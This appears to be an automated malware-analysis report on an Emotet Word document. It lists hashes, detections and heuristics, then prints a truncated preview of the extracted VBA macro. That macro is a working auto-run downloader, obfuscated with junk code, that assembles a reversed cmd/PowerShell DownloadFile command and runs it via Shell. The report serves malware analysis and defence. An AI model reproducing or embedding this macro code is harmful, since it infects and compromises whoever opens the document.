Emotet Office (OLE) malware analysis — malicious · 05b899ee1ae0dd61

MALICIOUS

Office (OLE)

100.9 KB Created: 2018-09-21 19:37:00 Authoring application: Microsoft Office Word First seen: 2019-05-10

MD5: 82546c37ed38fa5611256399da479cf7 SHA-1: d388c0242fbe0a92055a61ceb6196d2f33a02ede SHA-256: 05b899ee1ae0dd6107effcc22880e75ccf90aee68df3ace9936d1cd17b518c9f

142 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6883993-0'. Static analysis revealed a VBA macro with an AutoOpen subroutine, which is a common technique for Emotet. The macro uses the Shell function to execute a payload, indicating it acts as a downloader for further malicious activity.

Heuristics 5

ClamAV: Doc.Downloader.Emotet-6883993-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6883993-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12275 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12275 bytes
SHA-256: `cc2d53435c832fa7f0d0846ae6771f7e6a9438a6efde932349d68bc866bf042c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "FNjkwjjBwR" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim QWfNuL(1) QWfNuL(0) = Right("qWGWbU", 116) Dim oXdoXp(1) oXdoXp(0) = MidB("sLCfpbTX", 746, 399) Dim Yvkrwc(1) Yvkrwc(0) = MidB("EDEFk", 568, 648) Dim Maptum(2) Maptum(0) = MidB("jlGnvCzR", 667, 675) Maptum(1) = MidB("DLHkG", 352, 127) Dim HwctRv(2) HwctRv(0) = Right("JhEIjjkc", 345) HwctRv(1) = Left("jnRJwLFc", 536) Dim IPmcBi(1) IPmcBi(0) = MidB("BcKjsh", 618, 175) Dim WcSizK(1) WcSizK(0) = MidB("AMDhr", 265, 354) Dim ScjhTP(1) ScjhTP(0) = Right("RIaajK", 871) Dim AOrTuu(2) AOrTuu(0) = Right("idZZdL", 166) AOrTuu(1) = MidB("uclLjH", 842, 619) QaEzjBk (KeyString(3 + 3 + 3 + 11 + 47) + uRaLPw + mcTlPjqNjR + fEljvtStCO + KOrrJZhjofbn + sBdUcbPwdfaZLn) Dim kMQkN(1) kMQkN(0) = Right("JXpVakaD", 706) Dim pGNYW(2) pGNYW(0) = Right("QoWLulEE", 226) pGNYW(1) = Left("BwSDzHN", 977) Dim QjiuZT(1) QjiuZT(0) = Right("YMUTRitP", 43) End Sub Function QaEzjBk(haswlBEtmE As String) Dim RrQLtS(2) RrQLtS(0) = MidB("AZpGH", 538, 213) RrQLtS(1) = MidB("PwjPLTj", 45, 279) Dim YmzAc(1) YmzAc(0) = Right("PqDQYPS", 211) Shell@ haswlBEtmE, CInt(msoBarTypeNormal) Dim IoFAGY(2) IoFAGY(0) = Right("zKusKGaw", 517) IoFAGY(1) = Mid("ZHOshIQ", 732, 905) Dim PdiYQ(2) PdiYQ(0) = Right("iwZMOfwf", 833) PdiYQ(1) = Mid("NsEaWjPY", 526, 150) Dim OCafo(2) OCafo(0) = MidB("LZULVs", 827, 880) OCafo(1) = Mid("WkGzYYj", 577, 191) Dim PlMFj(2) PlMFj(0) = MidB("NzCUdj", 609, 509) PlMFj(1) = MidB("JKCCbPca", 296, 741) Dim lpCBQX(2) lpCBQX(0) = MidB("MUpAj", 596, 270) lpCBQX(1) = Mid("UGWJlW", 104, 307) End Function Attribute VB_Name = "nKzThGzWXwMoBb" Function uRaLPw() Dim lHnwTZ(1) lHnwTZ(0) = MidB("PRYzK", 649, 77) Dim ZEIhI(1) ZEIhI(0) = Mid("SRFwQM", 243, 971) Dim dSrVF(2) dSrVF(0) = MidB("AGQYMhQZ", 363, 406) dSrVF(1) = Mid("tNCXVN", 891, 268) Dim izoTCk(2) izoTCk(0) = Right("ImGfCVNj", 18) izoTCk(1) = Mid("iYzJSSXt", 685, 296) zTNFG = "md /" + "V:" + "/C" + ChrW(0 + 0 + 5 + 4 + 25) + "s" + "^" + "et" + " ^tB" + "=" + "^ " + " ^" + " ^" + " " Dim wXjfw(2) wXjfw(0) = MidB("DcnciJ", 142, 243) wXjfw(1) = Left("diiOHMbq", 771) Dim CoIPdr(2) CoIPdr(0) = MidB("cwTjFs", 420, 92) CoIPdr(1) = Left("JfnsHmj", 958) Dim HlAfiv(2) HlAfiv(0) = Left("SlqsIFwH", 420) HlAfiv(1) = MidB("Ozcbs", 153, 186) PUsFRvwi = " ^" + " ^" + " ^ " + "^" + " " + " ^" + " " + " }}" Dim AmhPH(1) AmhPH(0) = MidB("FDwTn", 555, 726) Dim jBpIl(1) jBpIl(0) = MidB("vFcYDDh", 694, 39) Dim CpVhvA(2) CpVhvA(0) = MidB("UPUXw", 835, 764) CpVhvA(1) = Right("OducpsC", 690) XPICjAmaQkr = "{hc" + "^t^a" + "c" + "^}" + ";^" + "kae" + "r^b" + "^" + ";" + "^tZ" + "^Y^$" + " me" Dim dMrEwU(2) dMrEwU(0) = Mid("sLNpj", 608, 93) dMrEwU(1) = Right("VCLmi", 593) Dim VNCCtb(1) VNCCtb(0) = Mid("CJMcO", 581, 946) Dim WFrNb(2) WFrNb(0) = Left("dFhFrEH", 469) WFrNb(1) = MidB("uSiZOs", 851, 166) Dim wTlAkl(1) wTlAkl(0) = MidB("LwKiKnd", 451, 869) Dim Kziba(2) Kziba(0) = MidB("hjhPHzK", 26, 715) Kziba(1) = Right("BJJrjlR", 430) Dim WuNbE(1) WuNbE(0) = Mid("JSuvU", 833, 719) VbMzjh = "t" + "^" + "I^" + "-e" + "^ko" + "vn" + "^I^" + ";)" + "^t^Z" + "Y" + "$^ " Dim UYErU(2) UYErU(0) = MidB("ckZVEt", 482, 663) UYErU(1) = Left("XQcWO", 432) Dim LSKMA(1) LSKMA(0) = Right("nhEOsdJ", 565) ZKSpz = "^," + "^" + "i" + "^w^E" + "$(e" + "^l^" + "i^Fd" + "a" + "o^ln" + "w^o" + "^D^." + "P" + "P^" Dim jNzmIi(2) jNzmIi(0) = Right("sKlzMkow", 313) jNzmIi(1) = Left("ivpCqvpo", 528) Dim YwPaqd(1) YwPaqd(0) = MidB("JSpRS", 128, 598) Dim ZmfctI(1) ZmfctI(0) = MidB("CUNhHT", 729, 346) Dim TAlHbu(1) TAlHbu(0) = Left("ruvmNX", 944) Dim XUjUJ(1) ... (truncated)

SHA-256: cc2d53435c832fa7f0d0846ae6771f7e6a9438a6efde932349d68bc866bf042c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "FNjkwjjBwR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim QWfNuL(1)
QWfNuL(0) = Right("qWGWbU", 116)

   Dim oXdoXp(1)
oXdoXp(0) = MidB("sLCfpbTX", 746, 399)

   Dim Yvkrwc(1)
Yvkrwc(0) = MidB("EDEFk", 568, 648)

   Dim Maptum(2)
Maptum(0) = MidB("jlGnvCzR", 667, 675)
Maptum(1) = MidB("DLHkG", 352, 127)

   Dim HwctRv(2)
HwctRv(0) = Right("JhEIjjkc", 345)
HwctRv(1) = Left("jnRJwLFc", 536)

   Dim IPmcBi(1)
IPmcBi(0) = MidB("BcKjsh", 618, 175)

   Dim WcSizK(1)
WcSizK(0) = MidB("AMDhr", 265, 354)

   Dim ScjhTP(1)
ScjhTP(0) = Right("RIaajK", 871)

   Dim AOrTuu(2)
AOrTuu(0) = Right("idZZdL", 166)
AOrTuu(1) = MidB("uclLjH", 842, 619)

QaEzjBk (KeyString(3 + 3 + 3 + 11 + 47) + uRaLPw + mcTlPjqNjR + fEljvtStCO + KOrrJZhjofbn + sBdUcbPwdfaZLn)
   Dim kMQkN(1)
kMQkN(0) = Right("JXpVakaD", 706)

   Dim pGNYW(2)
pGNYW(0) = Right("QoWLulEE", 226)
pGNYW(1) = Left("BwSDzHN", 977)

   Dim QjiuZT(1)
QjiuZT(0) = Right("YMUTRitP", 43)

End Sub
Function QaEzjBk(haswlBEtmE As String)
   Dim RrQLtS(2)
RrQLtS(0) = MidB("AZpGH", 538, 213)
RrQLtS(1) = MidB("PwjPLTj", 45, 279)

   Dim YmzAc(1)
YmzAc(0) = Right("PqDQYPS", 211)

Shell@ haswlBEtmE, CInt(msoBarTypeNormal)
   Dim IoFAGY(2)
IoFAGY(0) = Right("zKusKGaw", 517)
IoFAGY(1) = Mid("ZHOshIQ", 732, 905)

   Dim PdiYQ(2)
PdiYQ(0) = Right("iwZMOfwf", 833)
PdiYQ(1) = Mid("NsEaWjPY", 526, 150)

   Dim OCafo(2)
OCafo(0) = MidB("LZULVs", 827, 880)
OCafo(1) = Mid("WkGzYYj", 577, 191)

   Dim PlMFj(2)
PlMFj(0) = MidB("NzCUdj", 609, 509)
PlMFj(1) = MidB("JKCCbPca", 296, 741)

   Dim lpCBQX(2)
lpCBQX(0) = MidB("MUpAj", 596, 270)
lpCBQX(1) = Mid("UGWJlW", 104, 307)

End Function

Attribute VB_Name = "nKzThGzWXwMoBb"
Function uRaLPw()
Dim lHnwTZ(1)
lHnwTZ(0) = MidB("PRYzK", 649, 77)

   Dim ZEIhI(1)
ZEIhI(0) = Mid("SRFwQM", 243, 971)

   Dim dSrVF(2)
dSrVF(0) = MidB("AGQYMhQZ", 363, 406)
dSrVF(1) = Mid("tNCXVN", 891, 268)

   Dim izoTCk(2)
izoTCk(0) = Right("ImGfCVNj", 18)
izoTCk(1) = Mid("iYzJSSXt", 685, 296)

zTNFG = "md /" + "V:" + "/C" + ChrW(0 + 0 + 5 + 4 + 25) + "s" + "^" + "et" + " ^tB" + "=" + "^  " + "  ^" + " ^" + " "
Dim wXjfw(2)
wXjfw(0) = MidB("DcnciJ", 142, 243)
wXjfw(1) = Left("diiOHMbq", 771)

   Dim CoIPdr(2)
CoIPdr(0) = MidB("cwTjFs", 420, 92)
CoIPdr(1) = Left("JfnsHmj", 958)

   Dim HlAfiv(2)
HlAfiv(0) = Left("SlqsIFwH", 420)
HlAfiv(1) = MidB("Ozcbs", 153, 186)

PUsFRvwi = " ^" + "  ^" + " ^  " + "^" + " " + " ^" + " " + "  }}"
Dim AmhPH(1)
AmhPH(0) = MidB("FDwTn", 555, 726)

   Dim jBpIl(1)
jBpIl(0) = MidB("vFcYDDh", 694, 39)

   Dim CpVhvA(2)
CpVhvA(0) = MidB("UPUXw", 835, 764)
CpVhvA(1) = Right("OducpsC", 690)

XPICjAmaQkr = "{hc" + "^t^a" + "c" + "^}" + ";^" + "kae" + "r^b" + "^" + ";" + "^tZ" + "^Y^$" + " me"
Dim dMrEwU(2)
dMrEwU(0) = Mid("sLNpj", 608, 93)
dMrEwU(1) = Right("VCLmi", 593)

   Dim VNCCtb(1)
VNCCtb(0) = Mid("CJMcO", 581, 946)

   Dim WFrNb(2)
WFrNb(0) = Left("dFhFrEH", 469)
WFrNb(1) = MidB("uSiZOs", 851, 166)

   Dim wTlAkl(1)
wTlAkl(0) = MidB("LwKiKnd", 451, 869)

   Dim Kziba(2)
Kziba(0) = MidB("hjhPHzK", 26, 715)
Kziba(1) = Right("BJJrjlR", 430)

   Dim WuNbE(1)
WuNbE(0) = Mid("JSuvU", 833, 719)

VbMzjh = "t" + "^" + "I^" + "-e" + "^ko" + "vn" + "^I^" + ";)" + "^t^Z" + "Y" + "$^ "
Dim UYErU(2)
UYErU(0) = MidB("ckZVEt", 482, 663)
UYErU(1) = Left("XQcWO", 432)

   Dim LSKMA(1)
LSKMA(0) = Right("nhEOsdJ", 565)

ZKSpz = "^," + "^" + "i" + "^w^E" + "$(e" + "^l^" + "i^Fd" + "a" + "o^ln" + "w^o" + "^D^." + "P" + "P^"
Dim jNzmIi(2)
jNzmIi(0) = Right("sKlzMkow", 313)
jNzmIi(1) = Left("ivpCqvpo", 528)

   Dim YwPaqd(1)
YwPaqd(0) = MidB("JSpRS", 128, 598)

   Dim ZmfctI(1)
ZmfctI(0) = MidB("CUNhHT", 729, 346)

   Dim TAlHbu(1)
TAlHbu(0) = Left("ruvmNX", 944)

   Dim XUjUJ(1)

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.